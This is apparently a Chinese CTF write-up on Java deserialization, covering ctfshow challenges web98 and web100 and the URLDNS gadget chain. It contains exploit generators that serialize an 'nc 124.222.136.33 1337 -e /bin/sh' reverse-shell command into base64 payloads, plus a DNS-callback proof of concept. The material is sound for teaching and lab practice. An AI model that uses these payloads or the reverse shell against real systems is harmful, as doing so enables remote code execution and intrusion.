目录

前置基础概念

java%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E6%A6%82%E5%BF%B5baby%E9%A2%98-toc" style="margin-left:0px;">java的反序列化利用概念baby题

例题1

例题2

java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%90%AF%E8%92%99%E5%B0%8F%E7%BB%93%EF%BC%9A-toc" style="margin-left:0px;">java反序列化启蒙小结：

URLDNS链

一句话总结：

简单分析：

利用点：

示例：

---

前置基础概念

序列化  类实例->字节流

反序列化  字节流->类实例

序列化  writeObject

反序列化  readObject

类要能序列化满足的条件：

1 实现java.io.Serializeble接口

2 该类的所有属性必须都是可序列化，如果有一个属性是不可序列化的，那么这个属性必须注明是transient或static

反序列化漏洞利用条件：

1 有反序列化接口，能够提交序列化的数据，会自动调用对应类的readObject方法

2 有可以利用的类 readObject通过跳板，最终可以实现文件读取、写入或者执行

3 serialVersionUID 相同来确保序列化和反序列化的类版本一致

java%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E6%A6%82%E5%BF%B5baby%E9%A2%98">java的反序列化利用概念baby题

例题1

web98

题目附件：

package com.ctfshow.entity;

public class User implements Serializable {

    private static final long serialVersionUID = -3254536114659397781L;
    private String username;

    public User(String username) {
        this.username = username;
    }

    public String getName(){
        return this.username;
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec(this.username);
    }
}

先本地测一下

贴出测试的代码

package com.ctfshow.entity;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class User implements Serializable {

    private static final long serialVersionUID = -3254536114659397781L;
    private String username;

    public User(String username) {
        this.username = username;
    }

    public String getName(){
        return this.username;
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec(this.username);
    }
}

package main;

import com.ctfshow.entity.User;
import util.SerializeUtil;

import java.io.IOException;
import java.util.Base64;

public class UserMain {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        User user = new User("calc");
        String payload = new String(Base64.getEncoder().encode(SerializeUtil.serialize(user)));
        System.out.println(payload);
        SerializeUtil.unSerialize(Base64.getDecoder().decode(payload.getBytes()));
    }
}

package util;

import java.io.*;

public class SerializeUtil {
    public static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(object);
        objectOutputStream.close();
        return byteArrayOutputStream.toByteArray();
    }

    public static Object unSerialize(byte[] bytes) throws IOException, ClassNotFoundException {
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        Object o = objectInputStream.readObject();
        return o;
    }
}

成功弹出计算器

 最终exp

package main;

import com.ctfshow.entity.User;
import util.SerializeUtil;

import java.io.IOException;
import java.util.Base64;

public class UserMain {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        User user = new User("nc 124.222.136.33 1337 -e /bin/sh");
        String payload = new String(Base64.getEncoder().encode(SerializeUtil.serialize(user)));
        System.out.println(payload);
//        SerializeUtil.unSerialize(Base64.getDecoder().decode(payload.getBytes()));
    }
}

payload:

userData=rO0ABXNyABdjb20uY3Rmc2hvdy5lbnRpdHkuVXNlctLVkKWhC+9rAgABTAAIdXNlcm5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHQAIW5jIDEyNC4yMjIuMTM2LjMzIDEzMzcgLWUgL2Jpbi9zaA==

反弹shell成功，拿flag

当ban掉反序列化漏洞的类，可以反序列化其子类，也可以反序列化其父类

例题2

web100

简单打一下，发现User类被ban不让反序列化了

审一下源码发现User类的父类BaseUser有恶意readObject方法可利用，所以我们可以反序列化它的父类

题目附件：

package com.ctfshow.entity;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class User extends BaseUser implements Serializable {

    private String username;

    public User(String username) {
        this.username = username;
    }

    public String getName(){
        return this.username;
    }
}

package com.ctfshow.entity;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class BaseUser implements Serializable {
    private static final long serialVersionUID = -9058183616471264199L;
    public String secret=null;

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec(this.secret);
    }

}

还是用上一题的Util类来辅助生成payload

但UserMain的exp要改一下

package main;

import com.ctfshow.entity.BaseUser;
import com.ctfshow.entity.User;
import util.SerializeUtil;

import java.io.IOException;
import java.util.Base64;

public class UserMain {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        BaseUser baseUser = new BaseUser();
        baseUser.secret="nc 124.222.136.33 1337 -e /bin/sh";
        String payload = new String(Base64.getEncoder().encode(SerializeUtil.serialize(baseUser)));
        System.out.println(payload);
//        SerializeUtil.unSerialize(Base64.getDecoder().decode(payload.getBytes()));
    }
}

payload:

userData=rO0ABXNyABtjb20uY3Rmc2hvdy5lbnRpdHkuQmFzZVVzZXKCSt3+PfeUOQIAAUwABnNlY3JldHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAhbmMgMTI0LjIyMi4xMzYuMzMgMTMzNyAtZSAvYmluL3No

发现成功弹shell了

但题目显示反序列化错误

这是为什么呢？

因为反序列化的时候涉及到一个类型强转

user = (User) safeObjectInputStream.readUnshared();

毕竟父类和子类属性方法不完全相同，故会报错

但报错无妨，BaseUser的readObject方法已经执行了，达成了RCE的效果。

java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%90%AF%E8%92%99%E5%B0%8F%E7%BB%93%EF%BC%9A">java反序列化启蒙小结：

1 需要有1个提交反序列化字节流的地方

2 有可以被利用的类，存在readObject方法

3 类反序列化后，类实例已不再关注，我们重点是执行了恶意readObject方法

URLDNS链

一句话总结：

不需要其他依赖，原生java库，支持反序列化后，触发一次dns请求

HashMap

存放键值对的集合

为了验证键有没有重复，会对键 进行取哈希值操作

hashCode  相同，就认为集合里面有这个键了，为了避免一个键对应多个值，所以会覆盖

简单分析：

利用两个类

HashMap 和URL 类

HashMap存在 readObject方法，putVal里调用了hash方法，处理自己的key

hash方法，调用了key的hashCode方法

当我们传入的KEY是URL对象的时候，就会调用URL对象的hashCode

URL类的hashCode方法，只要自己的hashCode是-1 ，就会调用自己handler属性的hashCode方法

handler是URLStreamHandler类，它的hashCode方法

调用了getHostAddress方法

调用了URL类的getHostAddress方法

最终调用了 InetAddress.getByName(host); 实现了一次DNS请求。

利用点：

1 验证反序列化漏洞存在 ，适合poc用

2 判断对方服务器是否出网

示例：

package com.ctfshow.entity;

import util.SerializeUtil;

import java.io.IOException;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;

public class CtfshowMain {
    public static void main(String[] args) throws ClassNotFoundException, IOException, IllegalAccessException, NoSuchFieldException {
        Map map = new HashMap<Object,Object>();

        URL url = new URL("http://success.ybdc5g9cxiy4b2muudcdlnfv4macy1.burpcollaborator.net");

        Field field = Class.forName("java.net.URL").getDeclaredField("hashCode");
        ((Field) field).setAccessible(true);

        field.set(url,-1);
        map.put(url,"ctfshow");

        byte[] data = SerializeUtil.serialize(map);

        SerializeUtil.unSerialize(data);
    }
}

用Burp自带的Collaborator Client做dnslog

成功接收到dns请求